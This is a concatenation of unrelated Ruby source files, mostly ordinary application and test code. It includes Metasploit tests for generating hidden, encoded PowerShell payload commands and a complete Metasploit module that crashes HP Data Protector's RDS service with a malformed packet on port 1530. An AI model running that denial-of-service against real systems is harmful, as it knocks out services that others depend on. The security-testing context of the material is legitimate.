decompress(code).include?('Start-Sleep -s ').should be_truthy
end
end
context 'when prepend_sleep isnt set' do
before do
subject.datastore['Powershell::prepend_sleep'] = nil
subject.options.validate(subject.datastore)
end
it 'shouldnt prepend sleep' do
code = subject.cmd_psh_payload(payload, arch)
decompress(code).include?('Start-Sleep -s ').should be_falsey
end
end
context 'when prepend_sleep is 0' do
before do
subject.datastore['Powershell::prepend_sleep'] = 0
subject.options.validate(subject.datastore)
end
it 'shouldnt prepend sleep' do
code = subject.cmd_psh_payload(payload, arch)
decompress(code).include?('Start-Sleep -s ').should be_falsey
end
end
context 'when method is old' do
before do
subject.datastore['Powershell::method'] = 'old'
subject.options.validate(subject.datastore)
end
it 'should generate a command line' do
code = subject.cmd_psh_payload(payload, arch)
decompress(code).include?('-namespace Win32Functions').should be_truthy
end
it 'shouldnt shorten args' do
code = subject.cmd_psh_payload(payload, arch)
code.include?('-NoProfile -WindowStyle hidden -Command').should be_truthy
end
it 'should include -NoExit' do
code = subject.cmd_psh_payload(payload, arch)
code.include?('-NoProfile -WindowStyle hidden -NoExit -Command').should be_truthy
end
end
context 'when method is net' do
before do
subject.datastore['Powershell::method'] = 'net'
subject.options.validate(subject.datastore)
end
it 'should generate a command line' do
code = subject.cmd_psh_payload(payload, arch)
decompress(code).include?('System.Runtime.InteropServices;').should be_truthy
end
end
context 'when method is reflection' do
before do
subject.datastore['Powershell::method'] = 'reflection'
subject.options.validate(subject.datastore)
end
it 'should generate a command line' do
code = subject.cmd_psh_payload(payload, arch)
decompress(code).include?('GlobalAssemblyCache').should be_truthy
end
end
context 'when method is msil' do
before do
subject.datastore['Powershell::method'] = 'msil'
subject.options.validate(subject.datastore)
end
it 'should raise an exception' do
except = false
begin
subject.cmd_psh_payload(payload, arch)
rescue RuntimeError
except = true
end
except.should be_truthy
end
end
context 'when method is unknown' do
before do
subject.datastore['Powershell::method'] = 'blah'
end
it 'should raise an exception' do
except = false
begin
subject.cmd_psh_payload(payload, arch)
rescue RuntimeError
except = true
end
except.should be_truthy
end
after do
subject.datastore['Powershell::method'] = 'reflection'
subject.options.validate(subject.datastore)
end
end
context 'when encode_inner_payload' do
it 'should contain an inner payload with -e' do
code = subject.cmd_psh_payload(payload, arch, {:encode_inner_payload => true})
code.include?(' -e ').should be_truthy
end
context 'when no_equals is true' do
it 'should raise an exception' do
except = false
begin
code = subject.cmd_psh_payload(payload, arch, {:encode_inner_payload => true, :no_equals => true})
rescue RuntimeError
except = true
end
except.should be_truthy
end
end
end
context 'when encode_final_payload' do
context 'when no_equals is false' do
it 'should contain a final payload with -e' do
code = subject.cmd_psh_payload(payload, arch, {:encode_final_payload => true, :no_equals => false})
code.include?(' -e ').should be_truthy
code.include?(' -c ').should be_falsey
end
end
context 'when no_equals is true' do
it 'should contain a final payload with -e' do
code = subject.cmd_psh_payload(payload, arch, {:encode_final_payload => true, :no_equals => true})
code.include?(' -e ').should be_truthy
code.include?(' -c ').should be_falsey
code.include?('=').should be_falsey
end
end
context 'when encode_inner_payload is true' do
it 'should raise an exception' do
except = false
begin
subject.cmd_psh_payload(payload, arch, {:encode_final_payload => true, :encode_inner_payload => true})
rescue RuntimeError
except = true
end
except.should be_truthy
end
end
end
context 'when remove_comspec' do
it 'shouldnt contain %COMSPEC%' do
code = subject.cmd_psh_payload(payload, arch, {:remove_comspec => true})
code.include?('%COMSPEC%').should be_falsey
end
end
context 'when use single quotes' do
it 'should wrap in single quotes' do
code = subject.cmd_psh_payload(payload, arch, {:use_single_quotes => true})
code.include?(' -c \'').should be_truthy
end
end
end
describe "::generate_psh_command_line" do
it 'should contain no full stop when :no_full_stop' do
opts = {:no_full_stop => true}
command = subject.generate_psh_command_line(opts)
command.include?("powershell ").should be_truthy
end
it 'should contain full stop unless :no_full_stop' do
opts = {}
command = subject.generate_psh_command_line(opts)
command.include?("powershell.exe ").should be_truthy
opts = {:no_full_stop => false}
command = subject.generate_psh_command_line(opts)
command.include?("powershell.exe ").should be_truthy
end
it 'should ensure the path should always ends with \\' do
opts = {:path => "test"}
command = subject.generate_psh_command_line(opts)
command.include?("test\\powershell.exe ").should be_truthy
opts = {:path => "test\\"}
command = subject.generate_psh_command_line(opts)
command.include?("test\\powershell.exe ").should be_truthy
end
end
  # Generates examples for every contiguous slice of the argument table,
  # checking short and long argument rendering agree on count and shape.
  describe "::generate_psh_args" do
    it 'should return empty string for nil opts' do
      subject.generate_psh_args(nil).should eql ""
    end

    command_args = [[:encodedcommand, "parp"],
                    [:executionpolicy, "bypass"],
                    [:inputformat, "xml"],
                    [:file, "x"],
                    [:noexit, true],
                    [:nologo, true],
                    [:noninteractive, true],
                    [:mta, true],
                    [:outputformat, 'xml'],
                    [:sta, true],
                    [:noprofile, true],
                    [:windowstyle, "hidden"],
                    [:command, "Z"]
    ]

    # Every contiguous slice command_args[i...j] of the table above.
    permutations = (0..command_args.length).to_a.combination(2).map{|i,j| command_args[i...j]}

    permutations.each do |perms|
      opts = {}
      perms.each do |k,v|
        opts[k] = v
        # NOTE(review): each `it` closes over the SAME `opts` hash, which
        # keeps growing during this inner loop (and gains :shorten at run
        # time). By the time an example executes, it sees the accumulated
        # hash, not the snapshot interpolated into its description. The
        # assertions are computed from that same run-time hash so they stay
        # self-consistent, but confirm this aliasing is intentional.
        it "should generate correct arguments for #{opts}" do
          opts[:shorten] = true
          short_args = subject.generate_psh_args(opts)
          opts[:shorten] = false
          long_args = subject.generate_psh_args(opts)
          # Subtract 1 for the :shorten key itself.
          opt_length = opts.length - 1

          short_args.should_not be_nil
          long_args.should_not be_nil
          short_args.count('-').should eql opt_length
          long_args.count('-').should eql opt_length
          short_args[0].should_not eql " "
          long_args[0].should_not eql " "
          short_args[-1].should_not eql " "
          long_args[-1].should_not eql " "

          if opts[:command]
            long_args[-10..-1].should eql "-Command Z"
            short_args[-4..-1].should eql "-c Z"
          end
        end
      end
    end
  end
end
| 31.769857 | 114 | 0.631258 |
038e3cadd1a08f430536c3e952554ef9a6f1e597 | 1,436 | # coding: utf-8
module KuaiJieQian
  module Utils
    #
    # Converts every key of the hash to a Symbol.
    # @param hash [Hash] the hash to transform
    #
    # @return [Hash] a new hash with symbolized keys
    #
    def self.symbolize_keys(hash)
      new_hash = {}
      hash.each do |key, value|
        # The inline rescue keeps keys that don't respond to #to_sym
        # (e.g. Integers) unchanged.
        new_hash[(key.to_sym rescue key) || key] = value
      end
      new_hash
    end

    # Renders an HTML stream to PDF bytes via PDFKit.
    def self.html_to_pdf(html_file_stream)
      kit = PDFKit.new(html_file_stream)
      kit.to_pdf
    end

    # Rasterises each page of the PDF at +pdf_file_path+ to
    # "<png_path_dir>/<png_name>_<page>.png" using RMagick (white background).
    # Returns an array of {fullname:, successd:} hashes, one per page
    # (the `successd` key name is a historical typo kept for compatibility).
    def self.pdf_to_png(pdf_file_path, png_path_dir, png_name)
      pngs = []
      pdf = Magick::ImageList.new(pdf_file_path){self.background_color = 'white'}
      pdf.each_with_index{ |obj, i|
        png_file_fullname = "#{png_path_dir}/#{png_name}_#{i+1}.png"
        res = obj.write(png_file_fullname)
        pngs << {fullname: png_file_fullname, successd: !res.nil?}
      }
      # Previous Grim-based implementation, kept for reference:
      # pdf = Grim.reap(pdf_file_path)
      # KuaiJieQian.logger.info pdf_file_path
      # KuaiJieQian.logger.info pdf
      # count = pdf.count
      # KuaiJieQian.logger.info count
      # (0..count-1).each{ |i|
      #   png_file_fullname ="#{png_path_dir}/#{png_name}_#{i+1}.png"
      #   KuaiJieQian.logger.info i
      #   successd = pdf[i].save(png_file_fullname,
      #     {:quality => 90, :alpha => "remove", :colorspace => "RGB"})
      #   pngs << {fullname: png_file_fullname, successd: successd}
      # }
      pngs
    end
  end # end module
end
01e547414aba45f8ff44628ff086ae64af982633 | 455 | # frozen_string_literal: true
control 'event_edit_forward' do
describe event('uei.opennms.org/cheftest/thresholdExceeded2', 'events/chef.events.xml', [{ 'mename' => 'id', 'mevalue' => ['.1.3.6.1.4.1.11385.102.1'] }, { 'mename' => 'generic', 'mevalue' => ['6'] }, { 'mename' => 'specific', 'mevalue' => ['2'] }]) do
it { should exist }
its('forward') { should eq([{ 'info' => 'fwdInfo', 'state' => 'off', 'mechanism' => 'snmpudp' }]) }
end
end
| 56.875 | 254 | 0.593407 |
6a497e80601524711f359661501d036a6b24076f | 2,868 | require 'test_helper'
class PasswordResetsTest < ActionDispatch::IntegrationTest
def setup
ActionMailer::Base.deliveries.clear
@user = users(:chloe)
end
test "password resets" do
get new_password_reset_path
assert_template 'password_resets/new'
#invalid email
post password_resets_path, params: { password_reset: { email: "" } }
assert_not flash.empty?
assert_template 'password_resets/new'
#valid email
post password_resets_path,
params: { password_reset: { email: @user.email } }
assert_not_equal @user.reset_digest, @user.reload.reset_digest
assert_equal 1, ActionMailer::Base.deliveries.size
assert_not flash.empty?
assert_redirected_to root_url
#password reset form
user = assigns(:user)
#wrong email
get edit_password_reset_path(user.reset_token, email: "")
assert_redirected_to root_url
#innactive user
user.toggle!(:activated)
get edit_password_reset_path(user.reset_token, email: user.email)
assert_redirected_to root_url
user.toggle!(:activated)
#right email, wrong token
get edit_password_reset_path('wrong token', email: user.email)
assert_redirected_to root_url
#right email, right token
get edit_password_reset_path(user.reset_token, email: user.email)
assert_template 'password_resets/edit'
assert_select "input[name=email][type=hidden][value=?]", user.email
#invalid password & confirmation
patch password_reset_path(user.reset_token),
params: { email: user.email,
user: { password: "foobaz",
password_confirmation: "barquux" } }
assert_select 'div#error_explanation'
#empty password & password confirmation
patch password_reset_path(user.reset_token),
params: { email: user.email,
user: { password: "",
password_confirmation: ""}}
assert_select 'div#error_explanation'
#valid password and confirmation
patch password_reset_path(user.reset_token),
params: { email: user.email,
user: { password: "foobaz",
password_confirmation: "foobaz" } }
assert is_logged_in?
assert_nil user.reload.reset_digest
assert_not flash.empty?
assert_redirected_to user
end
test "expired token" do
get new_password_reset_path
post password_resets_path,
params: { password_reset: { email: @user.email } }
@user = assigns(:user)
@user.update_attribute(:reset_sent_at, 3.hours.ago)
patch password_reset_path(@user.reset_token),
params: { email: @user.email,
user: { password: "foobar",
password_confirmation: "foobar" } }
assert_response :redirect
follow_redirect!
assert_match /expired/i, response.body
end
end
| 35.85 | 72 | 0.674686 |
7918bf465de9c77160d130b73bb12f514566cd9e | 2,307 | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'google/apis/script_v1/service.rb'
require 'google/apis/script_v1/classes.rb'
require 'google/apis/script_v1/representations.rb'
module Google
module Apis
# Apps Script API
#
# An API for managing and executing Google Apps Script projects.
#
# @see https://developers.google.com/apps-script/api/
module ScriptV1
VERSION = 'V1'
REVISION = '20180425'
# Read, send, delete, and manage your email
AUTH_SCOPE = 'https://mail.google.com/'
# Manage your calendars
CALENDAR_FEEDS = 'https://www.google.com/calendar/feeds'
# Manage your contacts
M8_FEEDS = 'https://www.google.com/m8/feeds'
# View and manage the provisioning of groups on your domain
AUTH_ADMIN_DIRECTORY_GROUP = 'https://www.googleapis.com/auth/admin.directory.group'
# View and manage the provisioning of users on your domain
AUTH_ADMIN_DIRECTORY_USER = 'https://www.googleapis.com/auth/admin.directory.user'
# View and manage the files in your Google Drive
AUTH_DRIVE = 'https://www.googleapis.com/auth/drive'
# View and manage your forms in Google Drive
AUTH_FORMS = 'https://www.googleapis.com/auth/forms'
# View and manage forms that this application has been installed in
AUTH_FORMS_CURRENTONLY = 'https://www.googleapis.com/auth/forms.currentonly'
# View and manage your Google Groups
AUTH_GROUPS = 'https://www.googleapis.com/auth/groups'
# View and manage your spreadsheets in Google Drive
AUTH_SPREADSHEETS = 'https://www.googleapis.com/auth/spreadsheets'
# View your email address
AUTH_USERINFO_EMAIL = 'https://www.googleapis.com/auth/userinfo.email'
end
end
end
| 35.492308 | 90 | 0.713914 |
e9f6079e1e246c20a2bf59426b2477fd7a534510 | 806 | Pod::Spec.new do |spec|
spec.cocoapods_version = '>= 1.0'
spec.name = "Instructions"
spec.version = "1.4.0"
spec.summary = "Create walkthroughs and guided tours (with coach marks) in a simple way, using Swift."
spec.homepage = "https://github.com/ephread/Instructions"
spec.license = 'MIT'
spec.author = { "Frédéric Maquin" => "[email protected]" }
spec.source = { :git => "https://github.com/ephread/Instructions.git", :tag => spec.version.to_s }
spec.swift_version = '5.0'
spec.platform = :ios, '9.0'
spec.requires_arc = true
spec.source_files = 'Instructions', 'Sources/**/*.swift'
spec.exclude_files = '**/*+AppExtensions.swift'
spec.resources = ["Sources/**/*.xcassets"]
end
| 40.3 | 113 | 0.593052 |
795ea2354cf9b717c5bc0306dfa1b7bd66509b40 | 2,714 | # Controller for Certificate views
class CertificatesController < ApplicationController
include ActionController::MimeResponds
before_action :set_default_request_format
before_action :require_auth, only: %i[show create update destroy]
before_action :check_current_cert, only: %i[create]
before_action :set_certificate, only: %i[show update destroy]
before_action :forbid_public_user, except: %i[show]
# GET /certificates
# GET /certificates.json
def index
render json: {
error: 'Method not allowed'
}, status: 405
end
# GET /certificates/1
# GET /certificates/1.json
def show
certuser = @certificate.user
unless @apiuser_is_public || @apiuser.admin? || certuser == @apiuser
render json: {
status: 'error',
error: 'Forbidden'
}, status: 403
end
respond_to do |format|
format.json
format.pem do
send_file(@certificate.path) unless @apiuser_is_public
end
end
end
# POST /certificates
# POST /certificates.json
def create
csr = OpenSSL::X509::Request.new params[:csr]
@certificate = ca.sign_csr(csr, @apiuser)
if @certificate.save
render :show, status: :created, location: @certificate
else
render json: @certificate.errors, status: :unprocessable_entity
end
end
# PATCH/PUT /certificates/1
# PATCH/PUT /certificates/1.json
def update
render json: {status: 'error', error: 'Invalid Certificate'}, status: 422 and return unless @certificate.active?
render json: {status: 'error', error: 'Bad parameters'}, status: 422 and return unless params[:valid].to_s == "false"
if @certificate.update(active: false, revoked: true, valid_until: Time.now)
render :show, status: :ok, location: @certificate
else
render json: @certificate.errors, status: :unprocessable_entity
end
end
# DELETE /certificates/1
# DELETE /certificates/1.json
def destroy
if @apiuser.admin?
File.delete(@certificate.path)
@certificate.destroy
else
render json: {
status: 'error',
error: 'forbidden'
}, status: :forbidden
end
end
private
# Render 422 if a user still has an old certificate when creating a new one
def check_current_cert
results = Certificate.where(user: @apiuser, active: true)
return unless results.exists?
render json: {
status: 'error',
error: 'Unrevoked certificate',
revoke_url: url_for(results.first)
}, status: :unprocessable_entity
end
# Use callbacks to share common setup or constraints between actions.
def set_certificate
@certificate = Certificate.find(params[:id])
end
def ca
CA.instance
end
end
| 27.414141 | 121 | 0.683861 |
6ad4ee5e1d30a0c4ec87666c26caaf2f76446794 | 1,570 | module RailsUtil
# `RailsUtil::Util` includes class helper methods for handling nested hashes
module Util
# Deep merges a nested hash given a path
# Does not mutate the original hash
# @param [String, Array] path the nested keys
# @param [String, Integer, Array] value the value of nested path key
# @param [Hash] obj the hash object to merge
# @return [Hash] the nested hash
def self.set_nested(path, value, obj={})
obj.deep_merge(path_to_hash(path, value))
end
# Deep merges a nested hash given a path
# Mutates the original hash
# @param [String, Array] path the nested keys
# @param [String, Integer, Array] value the value of nested path key
# @param [Hash] obj the hash object to merge
# @return [Hash] the nested hash
def self.set_nested!(path, value, obj={})
obj.deep_merge!(path_to_hash(path, value))
end
# Creates a nested hash given a path
# @param [String, Array] path the nested keys
# @param [String, Integer, Array] value the value of nested path key
# @return [Hash] the nested hash
def self.path_to_hash(path, value)
parts = (path.is_a?(String) ? path.split('.') : path).reverse
initial = { parts.shift => value }
parts.reduce(initial) { |a, e| { e => a } }
end
# Returns the underscored class name of an `ActiveRecord` object
# @param [ActiveRecord Object] the `ActiveRecord` object
# @return [String] underscored class name
def self.underscored_class_name(obj)
obj.class.to_s.underscore
end
end
end | 38.292683 | 78 | 0.668153 |
f876c6928bc879e99e412e33268eb38391d59d1c | 122 | etcd_installation_binary 'default' do
action :create
end
etcd_service_manager_systemd 'default' do
action :start
end
| 15.25 | 41 | 0.811475 |
87c97396a1510e6d6a488c7727f5f2bf1400437b | 4,055 | require 'spec_helper'
describe VCSToolkit::Diff do
describe 'instance' do
subject { described_class.from_sequences(%w(a b c d), %w(a b d e)) }
it { should be_a_kind_of Enumerable }
it { should respond_to :each }
it { should respond_to :has_changes? }
it { should respond_to :to_s }
it { should respond_to :new_content }
end
let(:diff_with_addition) { described_class.from_sequences(%w(a b c d), %w(a b c d e)) }
let(:diff_with_removal) { described_class.from_sequences(%w(a b c d), %w(a b d)) }
let(:diff_with_changes) { described_class.from_sequences(%w(a b c d), %w(a c c d)) }
let(:diff_without_changes) { described_class.from_sequences(%w(a b c d), %w(a b c d)) }
let(:diff_with_conflicts) { described_class.new([double(VCSToolkit::Conflict, conflict?: true)]) }
describe '#has_changes?' do
context 'with no changes' do
subject { diff_without_changes.has_changes? }
it { should be_false }
end
context 'with changes' do
subject { diff_with_changes.has_changes? }
it('should equal true') { should be_true }
end
end
describe '#has_conflicts?' do
context 'with no conflicts' do
subject { diff_with_changes.has_conflicts? }
it { should be_false }
end
context 'with conflicts' do
subject { diff_with_conflicts.has_conflicts? }
it('should equal true') { should be_true }
end
end
describe 'changes' do
context 'with no changes' do
subject { diff_without_changes }
it { should have_exactly(4).items }
it 'has no changes' do
should be_all { |change| change.unchanged? }
end
end
context 'with changes' do
subject { diff_with_changes }
it 'has a changed item' do
should be_any { |change| change.changed? }
end
end
context 'with addition' do
subject { diff_with_addition }
it 'has an addition change' do
should be_any { |change| change.adding? }
end
end
context 'with removal' do
subject { diff_with_removal }
it 'has a removal change' do
should be_any { |change| change.deleting? }
end
end
end
describe '#to_s' do
context 'with no changes' do
subject { diff_without_changes.to_s }
it { should eq 'abcd' }
end
context 'with addition' do
subject { diff_with_addition.to_s }
it { should eq 'abcd+e' }
end
context 'with removal' do
subject { diff_with_removal.to_s }
it { should eq 'ab-cd' }
end
context 'with changes' do
subject { diff_with_changes.to_s }
it { should eq 'a-b+ccd' }
end
it 'should keep newlines intact' do
file_one = "one\ntwo\nthree\nfour\n".lines
file_two = "one\ntwo!\nthree :)\nfour\nfive...\n".lines
diff = described_class.from_sequences(file_one, file_two).to_s
expect(diff).to eq "one\n-two\n+two!\n-three\n+three :)\nfour\n+five...\n"
end
end
describe '#new_content' do
context 'with no changes' do
subject { diff_without_changes.new_content('|', '!', '|') }
it { should eq %w(a b c d) }
end
context 'with addition' do
subject { diff_with_addition.new_content('|', '!', '|') }
it { should eq %w(a b c d e) }
end
context 'with removal' do
subject { diff_with_removal.new_content('|', '!', '|') }
it { should eq %w(a b d) }
end
context 'with changes' do
subject { diff_with_changes.new_content('|', '!', '|') }
it { should eq %w(a c c d) }
end
context 'with conflicts' do
subject { VCSToolkit::Merge.three_way(%w(a b c d), %w(a f c d), %w(a e c d)).new_content }
it { should eq %w(a <<< f >>> e === c d) }
end
context 'with conflicts format' do
subject { VCSToolkit::Merge.three_way(%w(a b c d), %w(a f c d), %w(a e c d)).new_content('(', '|', ')') }
it { should eq %w(a ( f | e ) c d) }
end
end
end | 28.159722 | 111 | 0.597041 |
bfbec5a18ecac781e2ef95c21639812077200115 | 291 | class CreatePledges < ActiveRecord::Migration
def change
create_table :pledges do |t|
t.string :name
t.string :email
t.text :comment
t.decimal :amount
t.references :project, index: true, foreign_key: true
t.timestamps null: false
end
end
end
| 20.785714 | 59 | 0.652921 |
113b0df7cfc0d2f7adb5fe2e9e29907c68af10d4 | 1,330 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/api/quota.proto
require 'google/protobuf'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/api/quota.proto", :syntax => :proto3) do
add_message "google.api.Quota" do
repeated :limits, :message, 3, "google.api.QuotaLimit"
repeated :metric_rules, :message, 4, "google.api.MetricRule"
end
add_message "google.api.MetricRule" do
optional :selector, :string, 1
map :metric_costs, :string, :int64, 2
end
add_message "google.api.QuotaLimit" do
optional :name, :string, 6
optional :description, :string, 2
optional :default_limit, :int64, 3
optional :max_limit, :int64, 4
optional :free_tier, :int64, 7
optional :duration, :string, 5
optional :metric, :string, 8
optional :unit, :string, 9
map :values, :string, :int64, 10
optional :display_name, :string, 12
end
end
end
module Google
module Api
Quota = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.api.Quota").msgclass
MetricRule = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.api.MetricRule").msgclass
QuotaLimit = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.api.QuotaLimit").msgclass
end
end
| 35 | 107 | 0.697744 |
11029de6750e1b79a78e2b4d65c04a9882e1585c | 1,301 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Data Protector Manager RDS DOS',
'Description' => %q{
This module causes a remote DOS on HP Data Protector's RDS service. By sending
a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous
size for malloc().
},
'Author' =>
[
'Roi Mallo <rmallof[at]gmail.com>', #initial discovery, poc
'sinn3r', #msf
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-0514' ],
[ 'OSVDB', '70617' ],
[ 'EDB', '15940' ],
],
'DisclosureDate' => 'Jan 8 2011' ))
register_options([
Opt::RPORT(1530),
])
end
def run
buf = "\x23\x8c\x29\xb6" #Header
buf << "\x64\x00\x00\x00" #Packet size
buf << "\x41"*4 #Data
connect
print_status("Sending malformed packet...")
sock.put(buf)
disconnect
end
end
| 25.509804 | 89 | 0.550346 |
012519463fb7ea06bec527f7ababdb7b280f73bb | 174 | module Events
class NoteOnWorkfile < Note
has_targets :workfile
has_activities :actor, :workfile, :workspace
include_shared_search_fields(:workspace)
end
end | 21.75 | 48 | 0.764368 |
fffb40dfbe70a9084397827b2917eca5be3b73ea | 1,554 | module Guard
module UI
class << self
def info(message, options = {})
unless ENV["GUARD_ENV"] == "test"
reset_line if options[:reset]
puts reset_color(message) if message != ''
end
end
def error(message, options = {})
unless ENV["GUARD_ENV"] == "test"
reset_line if options[:reset]
puts "ERROR: #{message}"
end
end
def debug(message, options = {})
unless ENV["GUARD_ENV"] == "test"
reset_line if options[:reset]
puts "DEBUG: #{message}" if ::Guard.options && ::Guard.options[:debug]
end
end
def reset_line
if color_enabled?
print "\r\e[0m"
else
print "\r\n"
end
end
def clear
system("clear;")
end
private
def reset_color(text)
color(text, "\e[0m")
end
def color(text, color_code)
if color_enabled?
return "#{color_code}#{text}\e[0m"
else
return text
end
end
def color_enabled?
@color_enabled ||= if Config::CONFIG['target_os'] =~ /mswin|mingw/i
unless ENV['ANSICON']
begin
require 'rubygems' unless ENV['NO_RUBYGEMS']
require 'Win32/Console/ANSI'
rescue LoadError
info "You must 'gem install win32console' to use color on Windows"
false
end
end
else
true
end
end
end
end
end
| 21.887324 | 80 | 0.503218 |
91df4dd558edec5db2787fb40c41ee8d1c169a4c | 37,828 | module OMS
class RetryRequestException < Exception
# Throw this exception to tell the fluentd engine to retry and
# inform the output plugin that it is indeed retryable
end
class Common
require 'json'
require 'net/http'
require 'net/https'
require 'time'
require 'zlib'
require 'digest'
require 'date'
require 'securerandom'
require_relative 'omslog'
require_relative 'oms_configuration'
@@OSFullName = nil
@@OSName = nil
@@OSVersion = nil
@@Hostname = nil
@@FQDN = nil
@@InstalledDate = nil
@@AgentVersion = nil
@@CurrentTimeZone = nil
@@tzMapping = {
'Australia/Darwin' => 'AUS Central Standard Time',
'Australia/Sydney' => 'AUS Eastern Standard Time',
'Australia/Melbourne' => 'AUS Eastern Standard Time',
'Asia/Kabul' => 'Afghanistan Standard Time',
'America/Anchorage' => 'Alaskan Standard Time',
'America/Juneau' => 'Alaskan Standard Time',
'America/Metlakatla' => 'Alaskan Standard Time',
'America/Nome' => 'Alaskan Standard Time',
'America/Sitka' => 'Alaskan Standard Time',
'America/Yakutat' => 'Alaskan Standard Time',
'Asia/Riyadh' => 'Arab Standard Time',
'Asia/Bahrain' => 'Arab Standard Time',
'Asia/Kuwait' => 'Arab Standard Time',
'Asia/Qatar' => 'Arab Standard Time',
'Asia/Aden' => 'Arab Standard Time',
'Asia/Dubai' => 'Arabian Standard Time',
'Asia/Muscat' => 'Arabian Standard Time',
'Etc/GMT-4' => 'Arabian Standard Time',
'Asia/Baghdad' => 'Arabic Standard Time',
'America/Buenos_Aires' => 'Argentina Standard Time',
'America/Argentina/La_Rioja' => 'Argentina Standard Time',
'America/Argentina/Rio_Gallegos' => 'Argentina Standard Time',
'America/Argentina/Salta' => 'Argentina Standard Time',
'America/Argentina/San_Juan' => 'Argentina Standard Time',
'America/Argentina/San_Luis' => 'Argentina Standard Time',
'America/Argentina/Tucuman' => 'Argentina Standard Time',
'America/Argentina/Ushuaia' => 'Argentina Standard Time',
'America/Catamarca' => 'Argentina Standard Time',
'America/Cordoba' => 'Argentina Standard Time',
'America/Jujuy' => 'Argentina Standard Time',
'America/Mendoza' => 'Argentina Standard Time',
'America/Halifax' => 'Atlantic Standard Time',
'Atlantic/Bermuda' => 'Atlantic Standard Time',
'America/Glace_Bay' => 'Atlantic Standard Time',
'America/Goose_Bay' => 'Atlantic Standard Time',
'America/Moncton' => 'Atlantic Standard Time',
'America/Thule' => 'Atlantic Standard Time',
'Asia/Baku' => 'Azerbaijan Standard Time',
'Atlantic/Azores' => 'Azores Standard Time',
'America/Scoresbysund' => 'Azores Standard Time',
'America/Bahia' => 'Bahia Standard Time',
'Asia/Dhaka' => 'Bangladesh Standard Time',
'Asia/Thimphu' => 'Bangladesh Standard Time',
'Europe/Minsk' => 'Belarus Standard Time',
'America/Regina' => 'Canada Central Standard Time',
'America/Swift_Current' => 'Canada Central Standard Time',
'Atlantic/Cape_Verde' => 'Cape Verde Standard Time',
'Etc/GMT+1' => 'Cape Verde Standard Time',
'Asia/Yerevan' => 'Caucasus Standard Time',
'Australia/Adelaide' => 'Cen. Australia Standard Time',
'Australia/Broken_Hill' => 'Cen. Australia Standard Time',
'America/Guatemala' => 'Central America Standard Time',
'America/Belize' => 'Central America Standard Time',
'America/Costa_Rica' => 'Central America Standard Time',
'Pacific/Galapagos' => 'Central America Standard Time',
'America/Tegucigalpa' => 'Central America Standard Time',
'America/Managua' => 'Central America Standard Time',
'America/El_Salvador' => 'Central America Standard Time',
'Etc/GMT+6' => 'Central America Standard Time',
'Asia/Almaty' => 'Central Asia Standard Time',
'Antarctica/Vostok' => 'Central Asia Standard Time',
'Indian/Chagos' => 'Central Asia Standard Time',
'Asia/Bishkek' => 'Central Asia Standard Time',
'Asia/Qyzylorda' => 'Central Asia Standard Time',
'Etc/GMT-6' => 'Central Asia Standard Time',
'America/Cuiaba' => 'Central Brazilian Standard Time',
'America/Campo_Grande' => 'Central Brazilian Standard Time',
'Europe/Budapest' => 'Central Europe Standard Time',
'Europe/Tirane' => 'Central Europe Standard Time',
'Europe/Prague' => 'Central Europe Standard Time',
'Europe/Podgorica' => 'Central Europe Standard Time',
'Europe/Belgrade' => 'Central Europe Standard Time',
'Europe/Ljubljana' => 'Central Europe Standard Time',
'Europe/Bratislava' => 'Central Europe Standard Time',
'Europe/Warsaw' => 'Central European Standard Time',
'Europe/Sarajevo' => 'Central European Standard Time',
'Europe/Zagreb' => 'Central European Standard Time',
'Europe/Skopje' => 'Central European Standard Time',
'Pacific/Guadalcanal' => 'Central Pacific Standard Time',
'Antarctica/Macquarie' => 'Central Pacific Standard Time',
'Pacific/Ponape' => 'Central Pacific Standard Time',
'Pacific/Kosrae' => 'Central Pacific Standard Time',
'Pacific/Noumea' => 'Central Pacific Standard Time',
'Pacific/Norfolk' => 'Central Pacific Standard Time',
'Pacific/Bougainville' => 'Central Pacific Standard Time',
'Pacific/Efate' => 'Central Pacific Standard Time',
'Etc/GMT-11' => 'Central Pacific Standard Time',
'America/Chicago' => 'Central Standard Time',
'America/Winnipeg' => 'Central Standard Time',
'America/Rainy_River' => 'Central Standard Time',
'America/Rankin_Inlet' => 'Central Standard Time',
'America/Resolute' => 'Central Standard Time',
'America/Matamoros' => 'Central Standard Time',
'America/Indiana/Knox' => 'Central Standard Time',
'America/Indiana/Tell_City' => 'Central Standard Time',
'America/Menominee' => 'Central Standard Time',
'America/North_Dakota/Beulah' => 'Central Standard Time',
'America/North_Dakota/Center' => 'Central Standard Time',
'America/North_Dakota/New_Salem' => 'Central Standard Time',
'CST6CDT' => 'Central Standard Time',
'America/Mexico_City' => 'Central Standard Time (Mexico)',
'America/Bahia_Banderas' => 'Central Standard Time (Mexico)',
'America/Merida' => 'Central Standard Time (Mexico)',
'America/Monterrey' => 'Central Standard Time (Mexico)',
'Asia/Shanghai' => 'China Standard Time',
'Asia/Chongqing' => 'China Standard Time',
'Asia/Harbin' => 'China Standard Time',
'Asia/Kashgar' => 'China Standard Time',
'Asia/Urumqi' => 'China Standard Time',
'Asia/Hong_Kong' => 'China Standard Time',
'Asia/Macau' => 'China Standard Time',
'Etc/GMT+12' => 'Dateline Standard Time',
'Africa/Nairobi' => 'E. Africa Standard Time',
'Antarctica/Syowa' => 'E. Africa Standard Time',
'Africa/Djibouti' => 'E. Africa Standard Time',
'Africa/Asmera' => 'E. Africa Standard Time',
'Africa/Addis_Ababa' => 'E. Africa Standard Time',
'Indian/Comoro' => 'E. Africa Standard Time',
